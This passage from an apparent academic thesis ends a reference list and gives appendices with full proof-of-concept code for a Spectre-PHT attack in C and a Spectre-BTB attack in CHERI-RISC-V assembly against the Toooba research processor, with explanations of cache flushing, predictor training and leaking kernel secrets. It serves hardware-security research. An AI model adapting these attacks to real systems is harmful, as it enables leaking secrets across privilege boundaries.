Symposium on Security and Privacy. San Francisco, CA, USA, May

2019.

[27] Moritz Lipp et al. “Meltdown: Reading Kernel Memory from User Space”.

In: Commun. ACM (May 2020), pp. 46–56.


[28] Jo Van Bulck et al. “Foreshadow: Extracting the Keys to the Intel SGX

Kingdom with Transient Out-of-Order Execution”. In: 27th USENIX

Security Symposium (USENIX Security 18). Baltimore, MD: USENIX

Association, Aug. 2018, pp. 991–1008.

[29] Intel Corporation. Intel® Software Guard Extensions Developer Guide.

https://software.intel.com/content/www/us/en/

develop/documentation/sgx-developer-guide/top.

html. Sept. 2016.

[30] Intel Corporation. Deep Dive: Intel Analysis of L1 Terminal Fault. Tech. rep. 2018. url: https://software.intel.com/security-software-guidance/advisory-guidance/l1-terminal-fault.

[31] Ofir Weisse et al. Foreshadow-NG: Breaking the Virtual Memory Ab-

straction with Transient Out-of-Order Execution. Tech. rep. 1.0. Aug.

2018, p. 7. url: https://foreshadowattack.eu/foreshadow-

NG.pdf.

[32] Arm Limited. Cache Speculation Side-channels. Tech. rep. 2.5. 2020,

p. 21. url: https://developer.arm.com/support/arm-

security-updates/speculative-processor-vulnerability.

[33] Intel Corporation. Intel Analysis of Speculative Execution Side Chan-

nels. Tech. rep. 4.0. 2018, p. 16. url: https://www.intel.com/

content/www/us/en/architecture-and-technology/

intel-analysis-of-speculative-execution-side-

channels-paper.html.

[34] Vladimir Kiriansky and Carl Waldspurger. Speculative Buffer Overflows:

Attacks and Defenses. 2018. arXiv: 1807.03757 [cs.CR].

[35] Dag Arne Osvik, Adi Shamir, and Eran Tromer. “Cache Attacks and

Countermeasures: The Case of AES”. In: Proceedings of the 2006 The

Cryptographers’ Track at the RSA Conference on Topics in Cryptology.

CT-RSA’06. San Jose, CA: Springer-Verlag, 2006, pp. 1–20.

[36] Arm Limited. Arm v8.5-A CPU updates. https://developer.

arm.com/support/arm-security-updates/speculative-

processor-vulnerability. Version 1.4. June 2019.


[37] Robert N. M. Watson et al. Capability Hardware Enhanced RISC In-

structions: CHERI Instruction-Set Architecture (Version 8). Tech. rep.

UCAM-CL-TR-951. University of Cambridge, Computer Laboratory,

Oct. 2020. url: https://www.cl.cam.ac.uk/techreports/

UCAM-CL-TR-951.pdf.

[38] Jonathan Woodruff et al. “CHERI Concentrate: Practical Compressed

Capabilities”. In: IEEE Transactions on Computers 68.10 (2019), pp. 1455–

1469.

[39] Brooks Davis et al. CheriABI: Enforcing valid pointer provenance and

minimizing pointer privilege in the POSIX C run-time environment.

Tech. rep. UCAM-CL-TR-932. University of Cambridge, Computer Lab-

oratory, Apr. 2019. url: https://www.cl.cam.ac.uk/techreports/

UCAM-CL-TR-932.pdf.

[40] Hongyan Xia et al. “CheriRTOS: A Capability Model for Embedded

Devices”. In: 2018 IEEE 36th International Conference on Computer

Design (ICCD). Orlando, FL, USA: IEEE Computer Society, Oct. 2018,

pp. 92–99.

[41] David Kaplan, Jeremy Powell, and Tom Woller. AMD SEV-SNP: Strengthening VM Isolation with Integrity Protection and More. Tech. rep. Advanced Micro Devices Inc., Jan. 2020. url: https://www.amd.com/system/files/TechDocs/SEV-SNP-strengthening-vm-isolation-with-integrity-protection-and-more.pdf.

[42] Abraham Gonzalez et al. “Replicating and Mitigating Spectre Attacks

on a Open Source RISC-V Microarchitecture”. In: Third Workshop on

Computer Architecture Research with RISC-V. Phoenix, AZ, USA, June

2019.

[43] Christopher Celio, David A. Patterson, and Krste Asanović. The Berke-

ley Out-of-Order Machine (BOOM): An Industry-Competitive, Synthe-

sizable, Parameterized RISC-V Processor. Tech. rep. UCB/EECS-2015-

167. University of California at Berkeley, Electrical Engineering and

Computer Sciences, June 2015.

[44] Anh-Tien Le et al. “Experiment on Replication of Side Channel Attack

via Cache of RISC-V Berkeley Out-of-Order Machine (BOOM) Im-

plemented on FPGA”. In: Fourth Workshop on Computer Architecture

Research with RISC-V (CARRV 2020). Valencia, Spain, May 2020.


[45] Arm Limited. Vulnerability of Speculative Processors to Cache Tim-

ing Side-Channel Mechanism. https://developer.arm.com/

support/arm-security-updates/speculative-processor-

vulnerability. 2020.

[46] Sizhou Zhang et al. “Composable Building Blocks to Open up Proces-

sor Design”. In: 2018 51st Annual IEEE/ACM International Symposium

on Microarchitecture (MICRO). Fukuoka, Japan, Oct. 2018, pp. 68–81.

[47] Zhen Hang Jiang and Yunsi Fei. “A novel cache bank timing attack”. In:

2017 IEEE/ACM International Conference on Computer-Aided Design

(ICCAD). Irvine, CA, USA, Nov. 2017, pp. 139–146.

[48] Hovav Shacham. “The Geometry of Innocent Flesh on the Bone: Return-

into-Libc without Function Calls (on the X86)”. In: Proceedings of

the 14th ACM Conference on Computer and Communications Security.

CCS ’07. Alexandria, Virginia, USA: Association for Computing Ma-

chinery, 2007, pp. 552–561.

[49] Arm Limited. Arm Architecture Reference Manual Supplement Morello

for A-profile Architecture. DDI0606. Arm Limited. Sept. 2020.


Appendix A

Full C Attack

/*
 * Author: Franz Fuchs
 *
 * Spectre-PHT proof of concept version
 *
 * spec_funct first checks the array bounds
 * and then loads the value determined by the
 * index. By training the Pattern History Table
 * with 16 calls to the function with valid indexes,
 * we trick Toooba into speculatively executing
 * the loads even though the index is out of bounds.
 */

#ifdef __CHERI_PURE_CAPABILITY__
#include "pure_cap.h"
#endif

// all *_SIZE values are in bytes, all *_SIZE_DW values
// are in 8-byte double words
#define MEM_SIZE 16384
#define MEM_SIZE_DW (MEM_SIZE / 8)
#define STACK_SIZE 2048
#define STACK_SIZE_DW (STACK_SIZE / 8)
#define PROBE_SIZE 2048
#define PROBE_SIZE_DW (PROBE_SIZE / 8)
#define SEC_ARR_SIZE 128
#define SEC_ARR_SIZE_DW (SEC_ARR_SIZE / 8)
#define FLUSH_ARR_SIZE 16384


#define FLUSH_ARR_SIZE_DW (FLUSH_ARR_SIZE / 8)

long int mem[MEM_SIZE_DW];
long int buffer[FLUSH_ARR_SIZE_DW];
long int stack[STACK_SIZE_DW];
long int flush_arr[FLUSH_ARR_SIZE_DW];

// arrays with secrets that must not
// be overflowed
long int* sec_arr_1[SEC_ARR_SIZE_DW];
long int* sec_arr_2[SEC_ARR_SIZE_DW];

long int size = 16;

int main();
void fill_sec_arr();
void probe();
long int spec_funct(long int index);
void flush();
extern void _init_sp(void);

int main()
{
    // write to stack so that it is
    // not optimized away
    stack[0] = 0;
    size = 16;
    fill_sec_arr();

    // train the pattern history table of the
    // speculative function
    flush_arr[0x0] = spec_funct(0x0);
    flush_arr[0x1] = spec_funct(0x1);
    flush_arr[0x2] = spec_funct(0x2);
    flush_arr[0x3] = spec_funct(0x3);
    flush_arr[0x4] = spec_funct(0x4);
    flush_arr[0x5] = spec_funct(0x5);


    flush_arr[0x6] = spec_funct(0x6);
    flush_arr[0x7] = spec_funct(0x7);
    flush_arr[0x8] = spec_funct(0x8);
    flush_arr[0x9] = spec_funct(0x9);
    flush_arr[0xa] = spec_funct(0xa);
    flush_arr[0xb] = spec_funct(0xb);
    flush_arr[0xc] = spec_funct(0xc);
    flush_arr[0xd] = spec_funct(0xd);
    flush_arr[0xe] = spec_funct(0xe);
    flush_arr[0xf] = spec_funct(0xf);

    // flush cache to evict the line
    // containing the `size` parameter
    flush();

    // store index at mem
    // keep line cached
    sec_arr_2[8] = &(mem[0x40]);

    // ensure that all previous
    // loads and stores are finished
    asm volatile("fence rw, rw");

    // call spec function with
    // out of bounds argument
    flush_arr[0x20] = spec_funct(24);

    // probe the memory
    probe();
}

void fill_sec_arr()
{
    for(int i = 0; i < size; i++)
    {
        sec_arr_1[i] = &(mem[0]);
    }
}


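void probe()
{
    long int dest;

    // touch one double word per 64-byte stride of mem;
    // the loop bound is the size of mem itself
    // (numerically equal to FLUSH_ARR_SIZE_DW)
    for(int i = 0; i < MEM_SIZE_DW; i = i + 8)
    {
        dest = mem[i];
        mem[i] = dest + 1;
    }
}

long int spec_funct(long int index)
{
    long int dest = index;

    // bounds check that is mispredicted during the attack
    if(index < size)
    {
        long int* mem_index = sec_arr_1[index];
        dest = *mem_index;
    }
    return dest;
}

void flush()
{
    long int dest;

    // touch one double word per 64-byte stride of flush_arr
    // in order to evict other cache lines
    for(int i = 0; i < FLUSH_ARR_SIZE_DW; i = i + 8)
    {
        dest = flush_arr[i];
        flush_arr[i] = dest + 1;
    }
}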

In this appendix, I explain how I conducted a Spectre-PHT attack written in C. However, I do not explain the specific Spectre-PHT vulnerability as I have already done so in Chapters 4 and 5. I chose a setup similar to the original Spectre-PHT attack demonstrated in [22]. Parts of the preparation code, e.g., initialising registers, are not shown in the code above. The attack setup is as follows. The function spec_funct accesses the array sec_arr_1 and returns the value stored at the secret memory pointer if the parameter value index is less than size. I chose size to be 16 in this example. There exists another array, sec_arr_2, which holds secret memory pointers as well. The goal of the attacker is to reveal one or more secret memory addresses from sec_arr_2 in this attack.
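The relation between the bounds check and the attacker's target can be illustrated with a small sketch. It is not part of the attack code: the struct secret_layout and both helper functions are hypothetical names introduced here, and the struct only models the assumption that sec_arr_2 directly follows sec_arr_1 in memory.

```c
#include <stddef.h>

#define SEC_ARR_SIZE_DW 16 /* SEC_ARR_SIZE / 8, as in the listing */

/* Hypothetical layout: a struct stands in for the adjacency that the
 * attack expects the compiler to produce for the two global arrays. */
struct secret_layout {
    long *sec_arr_1[SEC_ARR_SIZE_DW];
    long *sec_arr_2[SEC_ARR_SIZE_DW];
};

/* The architectural bounds check performed by spec_funct. */
int index_in_bounds(long index, long size)
{
    return index < size;
}

/* Element of sec_arr_2 that an index into sec_arr_1 would alias under
 * the assumed layout, or -1 if the index does not land in sec_arr_2. */
long aliased_sec_arr_2_index(long index)
{
    size_t byte_off = (size_t)index * sizeof(long *);
    size_t start = offsetof(struct secret_layout, sec_arr_2);
    size_t end = sizeof(struct secret_layout);

    if (index < 0 || byte_off < start || byte_off >= end)
        return -1;
    return (long)((byte_off - start) / sizeof(long *));
}
```

Under this assumption, the index 24 used in main fails the bounds check against size = 16 but corresponds to sec_arr_2[8], which is the element that main initialises before the attack.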

The arrays sec_arr_1 and sec_arr_2 are placed adjacently in memory by the compiler. The attacker wants to use a greater index than allowed in order to read from sec_arr_2 instead of sec_arr_1. The code in main fulfils three functions: it prepares the attack, conducts it, and eventually reveals the sought memory address by probing. In the preparation phase, I fill the array sec_arr_1 with meaningful pointer values and call the function spec_funct with values in the range [0, ..., 0xf] for the index parameter, which trains the Pattern History Table. Next, I need to flush the cache in order to evict the cache line that holds the value of the size variable. The flush function evicts cache lines by loading other cache lines that are not currently present.
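The effect of the 16 training calls can be sketched with a toy predictor. This is only an illustration under the assumption of a single 2-bit saturating counter per branch; Toooba's actual Pattern History Table may be organised differently, and all names below are hypothetical.

```c
/* Toy 2-bit saturating counter (an assumption, not Toooba's predictor):
 * states 0 and 1 predict that the bounds check fails,
 * states 2 and 3 predict that it passes. */
typedef struct {
    unsigned state;
} counter2_t;

int predict_in_bounds(const counter2_t *c)
{
    return c->state >= 2;
}

void train(counter2_t *c, int in_bounds)
{
    if (in_bounds) {
        if (c->state < 3)
            c->state++;
    } else {
        if (c->state > 0)
            c->state--;
    }
}

/* Replays the call sequence of main: 16 calls with indexes 0..15,
 * followed by the call with index 24. Returns 1 if the final call is
 * predicted to be in bounds although it is not. */
int attack_call_mispredicted(long size)
{
    counter2_t c = { 0 };
    long attack_index = 24;

    for (long index = 0; index < 16; index++)
        train(&c, index < size);

    return predict_in_bounds(&c) && !(attack_index < size);
}
```

With size = 16, the counter saturates in the "in bounds" state during training, so the out-of-bounds call is mispredicted and the loads in spec_funct can execute transiently.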

Flushing introduces the necessary delay for the actual Spectre-PHT attack later. After flushing, I also set up the array sec_arr_2 for the attack by storing a meaningful value. This brings the corresponding cache line into the cache as well, which makes the attack faster. The last step before the attack is to introduce a memory fence, which prevents the processor from speculating too far. Without the fence, uninitialised data would be used in speculation, which would lead to cache misses and therefore negatively impact the entire attack. In general, the attacker wants to use every cycle of the misspeculated control flow as effectively as possible and therefore wants to avoid unnecessary cache misses. After that, the actual attack is conducted as described in Chapters 4 and 5. Last, I use the probing mechanism described in Section 3.3.2, which reveals the sought value.
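The interplay of flushing by eviction, the transient load, and probing can be sketched with a toy cache model. The model is an assumption made for illustration only: a direct-mapped cache with 64 sets and 64-byte lines, which is not Toooba's cache configuration, and it reports hits and misses directly instead of measuring access latency. The addresses used with it are hypothetical.

```c
#include <stdint.h>
#include <string.h>

#define LINE_BYTES 64u /* assumed line size, matches the 8-double-word stride */
#define NUM_SETS   64u /* assumed number of sets of the toy cache */

typedef struct {
    int valid[NUM_SETS];
    uint64_t tag[NUM_SETS];
} toy_cache_t;

void cache_reset(toy_cache_t *c)
{
    memset(c, 0, sizeof *c);
}

/* Accesses addr; returns 1 on a hit and 0 on a miss. A miss fills the
 * line and evicts whatever was stored in the same set. */
int cache_access(toy_cache_t *c, uint64_t addr)
{
    uint64_t line = addr / LINE_BYTES;
    unsigned set = (unsigned)(line % NUM_SETS);
    uint64_t tag = line / NUM_SETS;

    if (c->valid[set] && c->tag[set] == tag)
        return 1;
    c->valid[set] = 1;
    c->tag[set] = tag;
    return 0;
}

/* Flush by eviction: touch one line per set in a disjoint region. */
void cache_flush_by_eviction(toy_cache_t *c, uint64_t flush_base)
{
    for (uint64_t off = 0; off < (uint64_t)NUM_SETS * LINE_BYTES; off += LINE_BYTES)
        (void)cache_access(c, flush_base + off);
}

/* Probe: returns the byte offset of the first cached line in
 * [base, base + size), or -1 if no line hits. */
long cache_probe(toy_cache_t *c, uint64_t base, uint64_t size)
{
    for (uint64_t off = 0; off < size; off += LINE_BYTES)
        if (cache_access(c, base + off))
            return (long)off;
    return -1;
}
```

In this model, a single access to base + 0x200 between the flush and the probe makes the probe return 0x200, which corresponds to mem[0x40] in the listing (0x40 double words of 8 bytes each).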


Appendix B

Full CHERI-RISC-V Attack

.text

/*
    Kernel-BTB
    Author: Franz Fuchs

    The goal of the attack is to speculatively jump from
    S mode to U mode. This gives an attacker the full
    register state of the code operating in S mode. In
    this example, the user code leaks private to M mode.
    This attack is similar to the sandbox attack.

    1st load: 0x0000000080060000
    2nd load: 0x0000000080061000
*/

change_to_cap_mode:
    // set pcc flags such that capability encoding
    // mode is used
    // This is described in the CHERI Specification v7
    cspecialr ct3, pcc
    li t1, 1
    csetflags ct3, ct3, t1
    li t2, 0x80000018
    csetoffset ct3, ct3, t2


    cjr ct3

init_caps:
    /*
     * data capabilities
     */

    // cs1 is a capability to [0x80001000 - 0x80001fff]
    li t2, 0x80001000
    cfromptr cs1, ddc, t2
    li t1, 0x1000
    csetbounds cs1, cs1, t1

    // ct6 is a capability to [0x80002000 - 0x80002fff]
    li t2, 0x80002000
    cfromptr ct6, ddc, t2
    li t1, 0x1000
    csetbounds ct6, ct6, t1

    // store value at 0(ct6)
    li t1, 0x200
    csd t1, 0(ct6)

    /*
     * code capabilities
     */

    // PCC for flush function
    cllc cs4, flush
    li t1, 0x100
    csetbounds cs4, cs4, t1

    // PCC for user code jump
    cllc cs5, user_funct_cont
    li t1, 0x100
    csetbounds cs5, cs5, t1


    // PCC for kernel code jump
    cllc ct1, kernel_funct_cont
    li t2, 0x100
    csetbounds ct1, ct1, t2

    // store at 0(cs1)
    csc ct1, 0(cs1)

init_exceps:
    // enable interrupts for all privilege levels
    // MIE = 1, SIE = 1, UIE = 1
    li t2, 0xb
    csrs mstatus, t2

    // delegate ecalls to S mode
    // ecalls are set with bit 8
    li t2, 256
    csrw medeleg, t2

// changes to S mode
change_to_s_mode:
    // set MPP such that we return to S mode
    li x6, 0x00001000
    csrc mstatus, x6
    li x6, 0x00000800
    csrs mstatus, x6

    // store perform_s_mode_action address in mepcc
    cllc ct0, perform_s_mode_action
    cspecialw mepcc, ct0
    mret

// initialises trap vector
perform_s_mode_action:
    // stvec mode: direct (value 0 as RISC-V instructions
    // are aligned on 2 byte boundaries)


    // stvec base address: kernel_funct
    cllc ct2, kernel_funct
    li t1, 0x10000
    csetbounds ct2, ct2, t1
    cspecialw stcc, ct2

change_to_u_mode:
    // set SPP such that we return to U mode
    li x6, 0x00000100
    csrc sstatus, x6

    // store user_funct address in sepcc
    cllc ct0, user_funct
    li t1, 0x10000
    csetbounds ct0, ct0, t1
    cspecialw sepcc, ct0

    // jump to user code
    sret

flush:
    // flush entire cache
    // use ddc for that
    // set to memory address not used by
    // other sections
    li t2, 0x80010000
    li t3, 0x4000
    add t3, t2, t3
    cfromptr ct1, ddc, t2

flush_loop:
    cld t0, 0(ct1)
    cincoffsetimm ct1, ct1, 64
    cgetaddr t0, ct1
    ble t0, t3, flush_loop


    // fence instruction
    fence rw, rw
    cret

/*
 * kernel code
 *
 * running in S privilege mode
 */
.section .kernel , "ax"

kernel_funct:
    // jump to start function
    // done this way in order to always have the same
    // start address, which makes it easier to
    // alias the right BTB entry
    j kernel_funct_start

.rept 0x40
.byte 0x00
.endr

kernel_funct_start:
    // generate a powerful capability
    li t2, 0x80060000
    li t3, 0x10000
    li t4, 0x1000
    add t3, t2, t3
    cfromptr ct6, ddc, t2
    csd t4, 0(ct6)

    // jump to kernel_funct_cont
    clc ct1, 0(cs1)

    // this jump will be aliased and MUST NOT be
    // moved around. If moved around, the corresponding
    // jump in the user code must be adjusted as well
    cjr ct1


.rept 0x40
.byte 0x00
.endr

kernel_funct_cont:
    // content of ct6 shall not be visible to anyone else
    cmove ct6, cnull

    // idle here
    j kernel_funct_cont

/*
 * user code
 *
 * running in U privilege mode
 */
.section .user , "ax"

user_funct:
    // done this way in order to always have the same
    // start address, which makes it easier to
    // alias the right BTB entry
    j user_funct_start

.rept 0xc52
.byte 0x00
.endr

user_funct_start:
    // flush caches
    cjalr cra, cs4

    // jump to continued code
    // this jump will be used for aliasing and MUST NOT be
    // moved around. If moved around, the corresponding
    // jump in the kernel code must be adjusted as well
    cjr cs5


.rept 0x40
.byte 0x00
.endr

user_funct_cont:
    // load from ct6
    // This is the transient-execution sequence
    // revealing the secret value
    cld t5, 0(ct6)
    cincoffset ct5, ct6, t5
    cld t5, 0(ct5)

    // call kernel_funct
    ecall

// infinite loop
user_funct_loop:
    add t1, x0, x0
    beq t1, x0, user_funct_loop

In this appendix, I explain how I conducted a Spectre-BTB attack written in CHERI-RISC-V assembly. However, I do not explain the specific Spectre-BTB vulnerability as I have already done so in Chapters 4 and 5. The code is separated into preparation code, kernel code, and user code. The goal of the attack is to leak a kernel-space secret from user space. I will only describe the preparation code, as the kernel and user-space code depicted above closely resembles the attack described in Section 5.1.3.

The first task is to bring Toooba from integer pointer mode to capability pointer mode, which is achieved in change_to_cap_mode by setting the corresponding flag in a code capability and then jumping to it. The next step is to set up capability registers with the code and data capabilities used during the demonstration of the attack later. This is done in the code following the init_caps label. The principle is always the same. First, the almighty capability stored in ddc is moved to a register and the base address of the capability is specified. As the second and last step, the bounds are set.
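The two-step derivation can be illustrated with a toy capability model in C. This is a sketch under simplifying assumptions and not the CHERI encoding: the struct toy_cap_t and all function names are hypothetical, bounds are stored uncompressed, the root capability starts at base 0, and a bounds violation clears the tag instead of raising an exception.

```c
#include <stdint.h>

/* Toy capability: uncompressed bounds, an address, and a validity tag. */
typedef struct {
    uint64_t base;   /* lowest accessible address */
    uint64_t length; /* number of accessible bytes starting at base */
    uint64_t addr;   /* current address */
    int tag;         /* 1 if the capability is valid */
} toy_cap_t;

/* Step 1, modelled on "cfromptr cd, ddc, rs": derive a capability from
 * the parent and point it at parent.base + offset. */
toy_cap_t toy_from_ptr(toy_cap_t parent, uint64_t offset)
{
    toy_cap_t c = parent;
    c.addr = parent.base + offset;
    return c;
}

/* Step 2, modelled on "csetbounds cd, cs, rt": shrink the bounds to
 * [addr, addr + length). Bounds can never grow beyond the parent's. */
toy_cap_t toy_set_bounds(toy_cap_t c, uint64_t length)
{
    toy_cap_t r = c;
    uint64_t parent_top = c.base + c.length;

    if (!c.tag || c.addr < c.base || c.addr > parent_top ||
        length > parent_top - c.addr) {
        r.tag = 0; /* the model invalidates instead of trapping */
        return r;
    }
    r.base = c.addr;
    r.length = length;
    return r;
}

/* Checks whether an access of `size` bytes at `addr` is authorised. */
int toy_in_bounds(toy_cap_t c, uint64_t addr, uint64_t size)
{
    return c.tag && addr >= c.base && size <= c.length &&
           addr - c.base <= c.length - size;
}
```

Applied to the listing, deriving from a root capability with offset 0x80001000 and length 0x1000 yields a capability for [0x80001000, 0x80001fff], as stated in the comment for cs1. Any later attempt to widen these bounds fails in the model.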

The largest part of the preparation code sets up Toooba such that the kernel code runs in S privilege mode and the user code runs in U privilege mode. The kernel code will be called during exception handling, which requires me to enable exceptions (done in init_exceps) and set up exception vectors. A pointer to the function kernel_funct is stored in stcc, the capability-extended version of the exception vector base address register in S privilege mode, which sets up exception handling. Finally, the code changes the privilege mode to U mode and jumps to the function user_funct, the beginning of the user code.
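The status-register constants used in the listing can be checked with a small C sketch. The bit positions follow the comments in the listing and the RISC-V privileged architecture (MPP in bits 12:11, SPP in bit 8, environment call from U mode as cause 8). The function names are hypothetical, and the sketch models the CSR updates as plain integer operations.

```c
#include <stdint.h>

#define MSTATUS_UIE (UINT64_C(1) << 0)
#define MSTATUS_SIE (UINT64_C(1) << 1)
#define MSTATUS_MIE (UINT64_C(1) << 3)
#define STATUS_SPP  (UINT64_C(1) << 8)
#define MSTATUS_MPP_SHIFT 11
#define MSTATUS_MPP_MASK  (UINT64_C(3) << MSTATUS_MPP_SHIFT)
#define CAUSE_ECALL_FROM_U 8

enum toy_priv { TOY_PRV_U = 0, TOY_PRV_S = 1, TOY_PRV_M = 3 };

/* csrs and csrc modelled as bit set and bit clear. */
uint64_t csr_set_bits(uint64_t csr, uint64_t mask)   { return csr | mask; }
uint64_t csr_clear_bits(uint64_t csr, uint64_t mask) { return csr & ~mask; }

/* Replays init_exceps and change_to_s_mode on a given mstatus value. */
uint64_t toy_mstatus_after_setup(uint64_t mstatus)
{
    mstatus = csr_set_bits(mstatus, 0xb);      /* MIE, SIE, UIE */
    mstatus = csr_clear_bits(mstatus, 0x1000); /* clear MPP[1] */
    mstatus = csr_set_bits(mstatus, 0x800);    /* set MPP[0] */
    return mstatus;
}

unsigned toy_mpp(uint64_t mstatus)
{
    return (unsigned)((mstatus & MSTATUS_MPP_MASK) >> MSTATUS_MPP_SHIFT);
}

/* Replays change_to_u_mode on a given sstatus value. */
uint64_t toy_sstatus_before_sret(uint64_t sstatus)
{
    return csr_clear_bits(sstatus, 0x100);     /* clear SPP */
}

unsigned toy_spp(uint64_t sstatus)
{
    return (unsigned)((sstatus & STATUS_SPP) >> 8);
}

/* Value written to medeleg: delegate ecalls from U mode to S mode. */
uint64_t toy_medeleg_for_ecall(void)
{
    return UINT64_C(1) << CAUSE_ECALL_FROM_U;
}
```

The sketch shows why mret lands in S mode (MPP becomes 01) and sret lands in U mode (SPP becomes 0), and that the constant 256 written to medeleg selects exactly the environment call from U mode.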

The two instructions in the function user_funct_start constitute the last part of the preparation code. The first instruction is a call to the flush function defined earlier in the code. This ensures that a load in the kernel code will miss all caches and therefore enables the attack, because Toooba misspeculates for a longer time. The second instruction is a jump to the label user_funct_cont. This jump instruction trains the BTB as described in Chapter 5. The ecall instruction is an environment call, which is handled by the kernel code. This effectively starts the attack. A probing function is not shown in the attack example above. At multiple places in the code, I use assembler macros that insert zero bytes or no-operations (nop). These are used to align instructions in memory such that the BTB aliasing approach works. The .section statements have the same task, but on a coarser scale.
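How padding makes two jumps alias can be sketched as follows. The index function below is purely hypothetical: it assumes a BTB with 256 entries that is indexed by the program counter bits above bit 0, which is not taken from Toooba's implementation, and the addresses used with it are invented for illustration.

```c
#include <stdint.h>

#define BTB_ENTRIES  256u /* hypothetical number of BTB entries */
#define BTB_PC_SHIFT 1u   /* hypothetical: bit 0 of the pc is ignored */

/* Hypothetical BTB index function: low pc bits above bit 0. */
unsigned btb_index(uint64_t pc)
{
    return (unsigned)((pc >> BTB_PC_SHIFT) % BTB_ENTRIES);
}

/* Smallest number of padding bytes to insert before the instruction at
 * `pc` so that it maps to the same BTB entry as the instruction at
 * `target_pc`. Both addresses are assumed to be 2-byte aligned. */
uint64_t padding_to_alias(uint64_t pc, uint64_t target_pc)
{
    uint64_t period = (uint64_t)BTB_ENTRIES << BTB_PC_SHIFT;

    /* unsigned wrap-around keeps the result in [0, period) */
    return (target_pc - pc) % period;
}
```

For example, with a user jump at the invented address 0x80002010 and a kernel jump at 0x80001048, the model asks for 0x38 bytes of padding. In the listing, the .rept blocks play this role, and the padding length depends on the real index function and on the final section addresses.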


TRITA-EECS-EX-2021:61

www.kth.se